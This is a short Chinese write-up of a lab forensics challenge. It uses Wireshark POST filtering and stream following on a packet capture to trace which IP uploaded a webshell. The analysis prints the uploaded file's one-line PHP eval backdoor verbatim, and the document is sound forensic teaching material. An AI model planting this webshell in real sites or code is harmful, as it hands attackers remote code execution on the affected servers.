打开靶场网页,下载文件并压缩
根据题意发现有人成功上传了WebShell,请找到上传者的IP地址。
使用Wireshark打开21.pcapng文件,因为是上传WebShell,所以数据走得应该是http协议,使用POST请求方式。属于在Wireshark中输入http.request.method==POST。过滤出http协议POST请求的数据出来。查看数据,找到uploads上传,一般上传文件都是在uploads目录下。
如果想让界面看起来简洁一点,对此数据右键使用Follow,追踪http数据流(HTTP stream)
追踪http数据流后发现,上传一个名为2.php的文件,
并且还有一句话木马<?php @eval($_POST['pgf']);?>
所以112.192.189.124就是上传WebShell的IP地址。把该IP地址输入靶场网页,即可得到key。
在线靶场-墨者-电子数据取证5星-网络数据分析溯源(上传WebShell的IP地址)
最新推荐文章于 2019-09-05 13:58:12 发布
通过墨者学院的在线靶场挑战,分析21.pcapng文件,利用Wireshark过滤HTTP POST请求,发现uploads目录下存在2.php文件,包含一句话木马。追踪HTTP数据流后,确定112.192.189.124为上传WebShell的IP地址。
摘要由CSDN通过智能技术生成